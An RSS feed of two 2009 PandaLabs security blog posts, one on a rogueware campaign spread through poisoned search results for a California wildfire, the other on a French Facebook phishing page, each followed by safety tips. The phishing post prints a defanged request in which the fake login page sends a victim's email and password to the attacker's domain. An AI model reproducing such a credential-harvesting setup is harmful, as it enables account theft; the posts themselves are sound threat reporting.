<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="http://pandalabs.pandasecurity.com/utility/FeedStylesheets/rss.xsl" media="screen"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:wfw="http://wellformedweb.org/CommentAPI/"><channel><title>PandaLabs : Tips</title><link>http://pandalabs.pandasecurity.com/archive/tags/Tips/default.aspx</link><description>Tags: Tips</description><dc:language>en</dc:language><generator>CommunityServer 2.1 SP2 (Build: 61120.2)</generator><item><title>Are Cyber Criminals Targeting Local Events In Your City?</title><link>http://pandalabs.pandasecurity.com/archive/Are-Cyber-Criminals-Targeting-Local-Events-In-Your-City_3F00_.aspx</link><pubDate>Thu, 27 Aug 2009 21:36:00 GMT</pubDate><guid isPermaLink="false">b262f9bf-63e5-46e5-8a14-4069a6997bc7:1032</guid><dc:creator>Sean-Paul Correll</dc:creator><slash:comments>0</slash:comments><comments>http://pandalabs.pandasecurity.com/comments/1032.aspx</comments><wfw:commentRss>http://pandalabs.pandasecurity.com/commentrss.aspx?PostID=1032</wfw:commentRss><description>&lt;p&gt; Panda Security has a California based office in Los Angeles.&amp;nbsp; We are located in close proximity to two  ongoing wildfires in the Angeles Crest National Forrest that have now burned  through at least 30 acres, so naturally we have been keeping an eye on it.&amp;nbsp; To my surprise, I pulled up a Google search for &amp;ldquo;Angeles Crest Fire&amp;rdquo; and the result yielded a malicious link above most relevant sources.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: 9/01/08 - The Blackhat SEO attack has now grown significantly: &lt;a href="http://bit.ly/7jqGc" target="_blank"&gt;http://bit.ly/7jqGc&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;
  &lt;br /&gt;
&lt;a href="http://www.flickr.com/photos/lithium-/3863044314/sizes/o/"&gt;&lt;img alt="Angeles Crest Fire - Malicious Search Result" border="0" src="http://farm3.static.flickr.com/2651/3863044314_271113a1b2.jpg" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
  Once clicked, the site loads and checks to make sure the  user came from Google.&amp;nbsp; If so, the following  script begins the redirection to the Rogueware site:&lt;br /&gt;
  &lt;br /&gt;
  &lt;img alt="Angeles Crest Fire - Malicious Script" border="0" height="25" src="http://farm3.static.flickr.com/2591/3863129480_b3e8db0044.jpg" width="500" /&gt;&lt;br /&gt;
  &lt;br /&gt;
The Rogueware site is designed to display a fake Antivirus  scan designed scare victims into thinking that their computer is infected.&amp;nbsp; If the Malware is downloaded and installed as  the site suggests, the user will see a fake Antivirus program pop up on their  computer.&amp;nbsp; At that point it becomes very  aggressive and difficult to remove.&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.flickr.com/photos/lithium-/3862323083/sizes/o/"&gt;
  &lt;img alt="Adware/PersonalAntivirus" border="0" height="363" src="http://farm4.static.flickr.com/3457/3862323083_06c292d798.jpg" width="500" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;strong&gt;&lt;br /&gt;
File:&lt;/strong&gt; Antivirus-x_x.exe&lt;br /&gt;
&lt;strong&gt;Size:&lt;/strong&gt; 172032&lt;br /&gt;
&lt;strong&gt;MD5:&lt;/strong&gt;  0E9BC3499560EEA9261F5883FAE2A10E
&lt;br /&gt;
&lt;strong&gt;Malware Info:&lt;/strong&gt; &lt;a href="http://www.pandasecurity.com/homeusers/security-info/about-malware/encyclopedia/overview.aspx?IdVirus=208332"&gt;Adware/PersonalAntivirus&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
  Rogueware attacks are among the most prevalent attacks on  the Internet today.&amp;nbsp; You can see our  latest report on them here: &lt;a href="http://www.pandasecurity.com/img/enc/The%20Business%20of%20Rogueware.pdf"&gt;The  Business of Rogueware&lt;/a&gt; (pdf)&lt;br /&gt;

&lt;p&gt;&lt;strong&gt;5 Steps to Avoid Infection&lt;/strong&gt;:&lt;/p&gt;

&lt;blockquote&gt;&lt;ol&gt;&lt;li&gt;Always have up-to-date Anti-Malware software  installed.&amp;nbsp; If you don&amp;rsquo;t have one or if  your current solution is not removing the Malware, you could download a free trial from us here: &lt;a href="http://www.pandasecurity.com/usa/homeusers/downloads/evaluation/"&gt;http://www.pandasecurity.com/usa/homeusers/downloads/evaluation/&lt;br /&gt;&lt;br /&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Don&amp;rsquo;t rely on search engines to provide valid or  safe search results.&amp;nbsp; You can improve  your chances of safe browsing by downloading our free Web of Trust browser  plugin: &lt;a href="http://www.pandasecurity.com/homeusers/downloads/wot/"&gt;http://www.pandasecurity.com/homeusers/downloads/wot/&lt;br /&gt;&lt;br /&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Pay close attention to what links you are  clicking on.&amp;nbsp; If you don&amp;rsquo;t recognize the  source you may want to research the domain in a separate search or avoid the  link all together.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Rogueware attacks rely on Social Engineering (I.e.  making you believe you are infected when you are not).&amp;nbsp; Don&amp;rsquo;t believe it!  Simply close the browser window if you see a scan appear all of the sudden.&amp;nbsp; If you cannot close the window with your mouse you can try ALT+F4 to force close it.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Don&amp;rsquo;t be afraid to ask for help.&amp;nbsp; Call your Antivirus Company or a tech savvy  friend if you feel that you are in over your head.&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/li&gt;&lt;/ol&gt;&lt;/blockquote&gt; 



&lt;ol&gt;
  

  

  

  

  

&lt;/ol&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;img src="http://pandalabs.pandasecurity.com/aggbug.aspx?PostID=1032" width="1" height="1"&gt;</description><category domain="http://pandalabs.pandasecurity.com/archive/tags/Rogueware/default.aspx">Rogueware</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Tips/default.aspx">Tips</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Blackhat+SEO/default.aspx">Blackhat SEO</category></item><item><title>Facebook Phishing Site Targets French Users</title><link>http://pandalabs.pandasecurity.com/archive/Facebook-Phishing-Site-Targets-French-Users.aspx</link><pubDate>Thu, 05 Feb 2009 11:18:00 GMT</pubDate><guid isPermaLink="false">b262f9bf-63e5-46e5-8a14-4069a6997bc7:960</guid><dc:creator>Sean-Paul Correll</dc:creator><slash:comments>0</slash:comments><comments>http://pandalabs.pandasecurity.com/comments/960.aspx</comments><wfw:commentRss>http://pandalabs.pandasecurity.com/commentrss.aspx?PostID=960</wfw:commentRss><description>&lt;p&gt;Today I discovered a new Facebook phishing site targeting French users.&amp;nbsp; The login page looks identical to the official &lt;a href="http://www.facebook.com/" title="Facebook Login"&gt;Facebook&lt;/a&gt; site, but the phishing site passes the victims credentials through a submission form before redirecting them to the official Facebook login site. &lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;a href="http://support.us.pandasecurity.com/blog/fakebook.png"&gt;&lt;img alt="Fake Facebook Login Page" border="0" height="490" src="http://support.us.pandasecurity.com/blog/fakebook.png" title="Fake Facebook Login Page" width="679" /&gt;&lt;/a&gt;&lt;/p&gt;
 
&lt;p&gt;&lt;strong&gt;Source: &lt;/strong&gt;&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;img alt="source code to phishing page" border="0" height="204" src="http://support.us.pandasecurity.com/blog/source.png" title="source code to phishing page" width="669" /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Connection:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;(Passing the victims credentials over to the attacker)&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&lt;sub&gt;&lt;strong&gt;GET&lt;/strong&gt; hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&amp;amp;locale=fr_FR&amp;amp;email=&lt;strong&gt;victim@domain.com&lt;/strong&gt;&amp;amp;pass=&lt;strong&gt;victimpass&lt;/strong&gt;&amp;amp;pass_placeholder=Mot+de+passe&amp;amp;charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&lt;/sub&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;(Redirecting to the official Facebook login page)&lt;/p&gt;
&lt;p&gt;&lt;sub&gt;&lt;strong&gt;302&lt;/strong&gt; Moved Temporarily to https://login.facebook.com/login.php &lt;strong&gt;&lt;/strong&gt;&lt;/sub&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;Even though this is a run of the mill phishing attack, we have noticed an uptrend of Phishing attacks especially in social networks.&amp;nbsp; The attackers can do many things with harvested accounts, but one of the most common is to harvest as many accounts as possible before unleashing mass spamvertising or even full blown malware campaigns.&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;strong&gt;Tips to Avoid Phishing Attacks on Facebook [&lt;a href="http://blog.facebook.com/blog.php?post=14600297130" title="Tips to Avoid Phishing"&gt;Facebook Blog&lt;/a&gt;]&lt;br /&gt;
&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Remember, Facebook will never ask for your password&lt;/strong&gt; in
an email, Facebook message, or any medium that isn&amp;#39;t the login page.
Though you will need to re-enter your password when you set a security
question, change your contact email, or send a virtual gift.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Be extra aware of weird Wall posts.&lt;/strong&gt;  Don&amp;#39;t click on any links&amp;mdash;on a Wall or elsewhere&amp;mdash;if you don&amp;#39;t know where they go.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Set a security question&lt;/strong&gt; for yourself on your &lt;a href="https://register.facebook.com/editaccount.php" title="https://register.facebook.com/editaccount.php" target="_blank"&gt;Account&lt;/a&gt;
page. If somehow something malicious shuts you out of your account, you
will need the answer to that question in order for our User Operations
team to let you back in. (If you&amp;#39;ve already set your security question,
you won&amp;#39;t see a prompt for it on your Account page.)&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Be extra aware of what website you are using to log in to Facebook&lt;/strong&gt;&lt;span&gt;
(and other websites). Phishing websites can be made to look like other
websites (like the Facebook log in page), and might try to disguise
their urls. Be smart: www.facebook.com.profile.a&lt;/span&gt;&lt;span class="word_break"&gt;&lt;/span&gt;36h8su2m8.info/login
starts out looking like a legitimate Facebook website, but that
a36h8su2m8.info part means it&amp;#39;s fraudulent. Set and use a browser
bookmark to make sure you always log in from facebook.com&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;If you see a Wall post that looks like spam&lt;/strong&gt; on a friend&amp;#39;s Wall, tell the author to delete it and reset their password immediately.&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Use a modern web browser&lt;/strong&gt; to benefit from anti-phishing protection
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://blogs.msdn.com/ie/archive/2005/09/09/463204.aspx" title="http://blogs.msdn.com/ie/archive/2005/09/09/463204.aspx        " target="_blank"&gt;Internet Explorer 7&lt;/a&gt;&lt;/li&gt;

&lt;li&gt;&lt;a href="http://www.mozilla.com/en-US/firefox/phishing-protection/" title="http://www.mozilla.com/en-US/firefox/phishing-protection/" target="_blank"&gt;Firefox&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;

&lt;li&gt;&lt;strong&gt;Check out &lt;a href="http://www.opendns.com/" title="http://www.opendns.com" target="_blank"&gt;opendns.com&lt;/a&gt;&lt;/strong&gt;. This is another method for blocking specific domains that host phishing sites.&lt;/li&gt;
&lt;/ul&gt;
Make sure that you have an up-to-date Anti-Malware solution running at all times to prevent Phishing and other types of malicious attacks.&amp;nbsp;&amp;nbsp; &lt;br /&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;br /&gt;
&amp;nbsp;&lt;br /&gt;
&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;

&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;img src="http://pandalabs.pandasecurity.com/aggbug.aspx?PostID=960" width="1" height="1"&gt;</description><category domain="http://pandalabs.pandasecurity.com/archive/tags/Phishing/default.aspx">Phishing</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Anti-Phishing/default.aspx">Anti-Phishing</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Social+Networks/default.aspx">Social Networks</category><category domain="http://pandalabs.pandasecurity.com/archive/tags/Tips/default.aspx">Tips</category></item></channel></rss>